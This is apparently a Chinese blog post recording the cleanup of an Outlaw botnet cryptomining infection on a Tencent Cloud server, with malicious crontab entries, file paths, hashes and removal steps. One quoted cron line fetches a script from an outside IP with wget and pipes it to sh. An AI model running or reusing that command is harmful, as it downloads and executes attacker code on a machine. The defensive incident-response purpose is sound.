Linux【问题记录 02】腾讯云 cron、sshd 进程CPU占用超95%(亡命徒 Outlaw 僵尸网络攻击)问题排查及处理步骤_crond占用cpu过高

最新推荐文章于 2024-10-10 22:13:52 发布
最新推荐文章于 2024-10-10 22:13:52 发布
阅读量705 收藏 14
点赞数 14
文章标签: linux 腾讯云 jenkins
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/2401_87021455/article/details/141981094
版权 

查看了一下定时任务:

[root@tcloud ~]# crontab -l
no crontab for root


查看了一下 /var/spool/cron/ 文件夹的定时任务:

[root@tcloud ~]# cd /var/spool/cron/
[root@tcloud cron]# ll
total 12
-rw------- 1 elasticsearch elasticsearch 328 Sep 13 23:19 elasticsearch
-rw------- 1 gpadmin gpadmin 73 Sep 2 01:55 gpadmin
-rw------- 1 hadoop hadoop 283 Aug 20 11:57 hadoop

[root@tcloud cron]# cat ./elasticsearch
1 1 */2 * * /usr/local/elasticsearch/.configrc/a/upd>/dev/null 2>&1
@reboot /usr/local/elasticsearch/.configrc/a/upd>/dev/null 2>&1
5 8 * * 1 /usr/local/elasticsearch/.configrc/b/sync>/dev/null 2>&1
@reboot /usr/local/elasticsearch/.configrc/b/sync>/dev/null 2>&1
#0 */23 * * * /tmp/.X26-unix/.rsync/c/aptitude>/dev/null 2>&1

这个明显就是kdevtmpfsi挖矿病毒的定时任务

[root@tcloud cron]# cat ./gpadmin

          • wget -q -O - http://195.3.146.118/spr.sh | sh > /dev/null 2>&1

[root@tcloud cron]# cat ./hadoop
1 1 */2 * * /tmp/.X25-unix/.rsync/c/a/upd>/dev/null 2>&1
@reboot /tmp/.X25-unix/.rsync/c/a/upd>/dev/null 2>&1
5 8 * * 1 /tmp/.X25-unix/.rsync/c/b/sync>/dev/null 2>&1
@reboot /tmp/.X25-unix/.rsync/c/b/sync>/dev/null 2>&1
0 */23 * * * /tmp/.X25-unix/.rsync/c/aptitude>/dev/null 2>&1


查看了一下阿里云的服务器:

[root@aliyun ~]# cd /var/spool/cron/
[root@aliyun cron]# ll
total 0


### 2.病毒处理建议


建议企业 Linux 服务器管理员检查服务器资源占用情况,及时修改弱密码,避免被暴力破解。若发现服务器已被入侵安装挖矿木马,可参考以下步骤手动检查、清除:


1. 删除以下文件,杀死对应进程:  
 /tmp/\*-unix/.rsync/a/kswapd0  
 \*/.configrc/a/kswapd0 md5: 84945e9ea1950be3e870b798bd7c7559  
 /tmp/\*-unix/.rsync/c/tsm64 md5: 4adb78770e06f8b257f77f555bf28065  
 /tmp/\*-unix/.rsync/c/tsm32 md5: 10ea65f54f719bffcc0ae2cde450cb7a
2. 检查 cron.d 中是否存在包含以下内容的定时任务,如有进行删除:  
 /a/upd  
 /b/sync  
 /c/aptitude


### 3.详细处理过程

1.先删除了 /var/spool/cron/ 下的全部文件

2.kill掉【cron】和【sshd】两个进程

3.查找定时任务

[root@tcloud ~]# find / -name cron.d
/usr/local/elasticsearch/.configrc/cron.d
/etc/cron.d
# /etc/cron.d 文件夹下文件【未发现病毒定时任务】
# 查看/usr/local/elasticsearch/.configrc/cron.d后发现是病毒任务 将其删除
[root@tcloud ~]# cat /usr/local/elasticsearch/.configrc/cron.d
1 1 */2 * * /usr/local/elasticsearch/.configrc/a/upd>/dev/null 2>&1
@reboot /usr/local/elasticsearch/.configrc/a/upd>/dev/null 2>&1
5 8 * * 1 /usr/local/elasticsearch/.configrc/b/sync>/dev/null 2>&1
@reboot /usr/local/elasticsearch/.configrc/b/sync>/dev/null 2>&1
#0 */23 * * * /tmp/.X26-unix/.rsync/c/aptitude>/dev/null 2>&1

4.查找 kswapd0 相关文件【未找到】

[root@tcloud ~]# find / -name kswapd0

5.查找 tsm64 相关文件【未找到】

[root@tcloud ~]# find / -name tsm64

2401_87021455
关注
Ubuntu16.04.01 kswapd0 进程占用cpu很高,中了亡命徒(Outlaw)挖矿B毒
本博客,博文仅代表个人操作经验,不能完全解决你的问题,仅供参考,佛系回复。
05-17 914
top看一下主机的资源使用情况 kswapd0 是系统的虚拟内存管理程序,如果物理内存不够用,系统就会唤醒 kswapd0 进程,由 kswapd0 分配磁盘交换空间作缓存,因而占用大量的 CPU 资源。(copy) netstat -antlp|grep kswapd0 tcp 0 0 192.168.31.230:45832 45.9.148.58:80 ESTABLISHED 28315/kswapd0 netstat -antlp|grep -e
奇怪的Cron Job占用了100CPU
那达慕的博客
09-30 3150
奇怪的Cron Job占用了100CPU 0 0 */3 * * /root/.firefoxcatche/a/upd>/dev/null 2>&1 @reboot /root/.firefoxcatche/a/upd>/dev/null 2>&1 5 8 * * 0 /root/.firefoxcatche/b/sync>/dev/null 2>&1...
Linux问题记录 02腾讯云 cronsshd 进程CPU占用95亡命徒 Outlaw 僵尸网络攻击问题排查处理步骤
Java与大数据相关实践内容分享!
09-15 1442
Linux问题记录 02腾讯云 cronsshd 进程CPU占用95亡命徒 Outlaw 僵尸网络攻击问题排查处理步骤
linux cpu占用过高问题排查思路
weixin_40048063的博客
04-18 6062
记录一次cpu占用过高排查思路 运营反馈线上环境app加载缓慢,于是查看了服务器cpu,发现cpu使用率高。 1,首先根据top命令,发现占用cpu最高的进程PID 如11291. 通过ps aux | grep PID命令,进一步查看当前进程的具体信息。 ps -mp 14811 -o THREAD,tid,time 找到耗时最高的线程TID,并将其线程ID转换为16进制格式:  ...
亚马逊云cpu异常占用100%
果果的博客
11-02 473
cron命令占用了100% 但是查看crontab -l并没有发现可以占用这么高的程序 通过/var/spool/cron/文件夹的定时任务,找到其隐藏文件,很可能感染了加密矿工。删除这些自启动文件 然后kill掉cron进程 占用瞬间就下来了 ...
linux进程cron占很多CPU,Linux进程多导致CPU卡死的有关问题
weixin_42293447的博客
04-28 1169
Linux进程多导致CPU卡死的问题转载请注明出处:http://blog.csdn.net/guoyjoe/article/details/49924557一、邮箱收到一堆监控,报警内空大致如下,很明显是CPU不够用了,IO也有点问题:主机: bwebser2__10.253.5.198时间: 2015.11.15 15:25:17状态: PROBLEM级别: Warning报警原因: Pr...
记录一次ubuntu服务器CPU占用100%的问题排查过程
ideaoverflow的博客
05-02 8459
最近在ubuntu服务器上跑深度学习的训练程序,运行一段时间程序就会被kill,给实验带来了不少麻烦。作为linux小白,着实是被这个问题困扰了一段时间,现将最后成功的方法记录下来。 关于这类问题,最常见的原因是系统内存不足,触发了OOM killer。于是先用htop查看系统的资源使用情况: 发现系统内存仍然是充足的,但是所有CPU核心都是100%占用。所以应该不是内存不足的问题,而是因为CPU爆满了。CPU主要是被一批“python”进程占用了。尽管这批进程的启动命令都显示为“python”,但没有参
记录一次linux负载和总cpu高,top查看不到高占用cpu资源的相关问题排查
weixin_39251134的博客
01-28 7171
平时服务器负载也就在1-3这样高的时候10多点,这几天服务器负载一直在20多,但是不影响用加上比较忙没处理,今天抽空处理一下,在此记录以后遇到相同问题做参考。 首先上图(将就看下之前20多负载的图没找到 这个是服务器有人下载东西很卡时候截的图) ![在这里插入图片描述](https://img-blog.csdnimg.cn/20210128135417882.png) 这里us使用了50多,但找不到占用资源非常高的进程。(以前遇到的木马脚本可以直接看到,顺着他去找到源码删除掉再kill进程删除相关.
linux中systemd进程占用cpu,linux systemd 进程cpu 打满解决
weixin_32487557的博客
04-30 4729
首先看到2个进程都是systemd 的100% 我都吃惊了。还以为中毒了然后尝试用命令查看cd /proc/17627 && ls -la查看CPU占用高的进程正在干什么cd /proc/17627/fd && ls -la查看CPU在操作什么文件句柄cat /proc/9650/status查看进程状态lsof | grep deleted查看当前系统句柄未释...
Linux服务器备份Oracle脚本及设置CRON详细步骤
07-22
5. **日志记录**:所有操作都应该被记录到日志文件中,以便于后期跟踪和排查问题。 然后,我们需要配置CRON服务来定期执行这个备份脚本。CRONLinux的定时任务调度器,它可以按照设定的时间间隔执行任务。在设置...
Shell脚本实现Linux系统和进程资源监控
12-11
Linux系统管理中,对系统资源的监控是至关重要的,特别是在服务器环境中,实时掌握CPU、内存、磁盘和网络端口的状态有助于及时发现并解决潜在问题。本文将介绍如何使用Shell脚本来实现这些监控功能。 1. **检查...
php-cgi进程cpu负载过高:禁用wordpress定时任务wp-cron.php
01-20
一、问题描述 1、19号手动升级到wordpress4.1,21号早上7点看网站php探针,发现系统负载过高,差不多在1到1.5之间。 2、虽然对于双核处理器,这个值还可以接受,但是之间负载都只有0.2左右,而网站流量又没有突然...
linux】冯诺依曼架构
Quietcoder的博客
10-10 805
🔥个人主页Quitecoder🔥linux笔记仓。
Linux进程地址空间(初步了解)
weixin_69380220的博客
10-04 1464
进程虚拟地址空间相关内容
[Linux#63][TCP] 常见标志位 | 为什么是三次握手,四次挥手?
最新发布
2301_80171004的博客
10-10 503
本文介绍了 TCP 协议中 6 个标志位的作用、三次握手和四次挥手的具体过程,以及 TIME_WAIT 状态的处理方法
黑马linux笔记(转载)
pscool的博客
10-01 2104
我们所熟知的计算机是由硬件和软件组成的。计算机系统中由电子、机械和光电元件等组成的各种物理装置的总称。(看的见、摸得着的东西:CPU、内存硬盘、显示屏、鼠标等)是用户和计算机硬件之间的接口和桥梁,用户通过软件和计算机进行交流。(操作系统,就是软件的一类)学习Linux系统,就需要有一个可用的Linux系统。由于Linux系统并不适合日常办公使用,所以我们需要借助虚拟机来获得可用的Linux系统环境进行学习。借助虚拟化技术,我们可以在系统中,通过软件:模拟计算机硬件,并给虚拟硬件安装真实的操作系统。
使用 SSH/SFTP 方法来实现 Windows 和 Kali Linux 之间的文件共享(fileZilla)
m0_69569041的博客
10-10 103
使用 SSH/SFTP 方法来实现 Windows 和 Kali Linux 之间的文件共享。
Linux和数据库)1.Linux操作系统和常用命令
2301_79144798的博客
10-09 538
除了办公和玩游戏之外不用Linux,其他地方都要使用Linux(it相关)iOS的本质是unix(unix是付费版本的操作系统)unix和Linux之间很相似命令 选项 参数由这三部分组成 可以只有命令目录就是文件夹。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值